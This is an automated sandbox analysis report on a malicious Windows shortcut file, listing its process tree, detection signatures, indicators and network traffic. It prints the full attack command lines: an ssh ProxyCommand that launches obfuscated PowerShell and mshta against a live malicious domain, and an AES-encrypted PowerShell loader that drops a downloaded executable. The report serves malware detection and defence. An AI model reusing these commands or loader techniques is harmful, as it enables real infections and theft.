Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tz1WicW6sG.lnk

Overview

General Information

Sample name:tz1WicW6sG.lnk
renamed because original name is a hash value
Original sample name:30fa4cb1ff177851f537fcb7e1a99dae38620761a7306677162a2664c3c86ea4.lnk.d.lnk
Analysis ID:1576539
MD5:762d0bf4de8d11d709c56029eb902274
SHA1:b4afb65882ab115067b40386324502f113b21333
SHA256:30fa4cb1ff177851f537fcb7e1a99dae38620761a7306677162a2664c3c86ea4
Tags:lnkstaticklipxuhaq-shopuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
May use the Tor software to hide its network traffic
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Lolbin Ssh.exe Use As Proxy
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ssh.exe (PID: 6460 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45)" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6804 cmdline: powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 3924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://static.klipxuhaq.shop/BUX6P.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 5868 cmdline: "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 6956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Acrobat.exe (PID: 7164 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Mcyga.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 7368 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 7584 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1636,i,16971974731040097592,9100869512474091707,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • bdd.exe (PID: 7204 cmdline: "C:\Users\user\AppData\Roaming\bdd.exe" MD5: 1B4971205E6226DF6B9B11527F70A14F)
  • svchost.exe (PID: 6220 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6956INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1f1381:$b1: ::WriteAllBytes(
  • 0x1f18a6:$b1: ::WriteAllBytes(
  • 0x5d68b:$s1: -join
  • 0x5de28:$s1: -join
  • 0x700f5:$s1: -join
  • 0x70619:$s1: -join
  • 0xa66b5:$s1: -join
  • 0xaf325:$s1: -join
  • 0xbbb2a:$s1: -join
  • 0xbc2c7:$s1: -join
  • 0xbd85a:$s1: -join
  • 0x1774cb:$s1: -join
  • 0x1845a0:$s1: -join
  • 0x187972:$s1: -join
  • 0x188024:$s1: -join
  • 0x189b15:$s1: -join
  • 0x18bd1b:$s1: -join
  • 0x18c542:$s1: -join
  • 0x18cdb2:$s1: -join
  • 0x18d4ed:$s1: -join
  • 0x18d51f:$s1: -join

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://static.klipxuhaq.shop/BUX6P.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3924, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4, ProcessId: 5868, ProcessName: mshta.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91
Sigma detected: Lolbin Ssh.exe Use As Proxy
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45)" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45)" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45)" ., ProcessId: 6460, ProcessName: ssh.exe
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6956, TargetFilename: C:\Users\user\AppData\Roaming\bdd.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45), CommandLine: powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45)" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 6460, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45), ProcessId: 6804, ProcessName: powershell.exe
Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6220, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-17T08:38:28.064886+010020197142Potentially Bad Traffic192.168.2.1249716188.114.96.6443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://denek.local-wanderer.shopAvira URL Cloud: Label: malware
Source: https://denek.local-wanderer.shop/bdd.exeAvira URL Cloud: Label: malware
Source: http://denek.local-wanderer.shopAvira URL Cloud: Label: malware
Source: https://denek.local-wanderer.shop/bdd.exepAvira URL Cloud: Label: malware
Source: https://denek.local-wanderer.shop/bdd.exe~Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: denek.local-wanderer.shopVirustotal: Detection: 13%Perma Link
Multi AV Scanner detection for submitted file
Source: tz1WicW6sG.lnkVirustotal: Detection: 41%Perma Link
Source: tz1WicW6sG.lnkReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.12:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.245.211.225:443 -> 192.168.2.12:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.12:49716 version: TLS 1.2
Source: Binary string: ntdll.pdb source: bdd.exe, 00000012.00000002.2758781037.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2767248068.0000000006990000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: bdd.exe, 00000012.00000002.2758781037.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2767248068.0000000006990000.00000004.00000800.00020000.00000000.sdmp
Source: global trafficHTTP traffic detected: GET /Mcyga.pdf HTTP/1.1Host: qu.axConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bdd.exe HTTP/1.1Host: denek.local-wanderer.shopConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox ViewIP Address: 188.114.96.6 188.114.96.6
Source: Joe Sandbox ViewIP Address: 188.114.96.6 188.114.96.6
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.12:49716 -> 188.114.96.6:443
Source: global trafficHTTP traffic detected: GET /BUX6P.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: static.klipxuhaq.shopConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /BUX6P.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: static.klipxuhaq.shopConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Mcyga.pdf HTTP/1.1Host: qu.axConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bdd.exe HTTP/1.1Host: denek.local-wanderer.shopConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: static.klipxuhaq.shop
Source: global trafficDNS traffic detected: DNS query: qu.ax
Source: global trafficDNS traffic detected: DNS query: denek.local-wanderer.shop
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: bdd.exe.8.drString found in binary or memory: http://ascstats.iobit.com/base-info.php
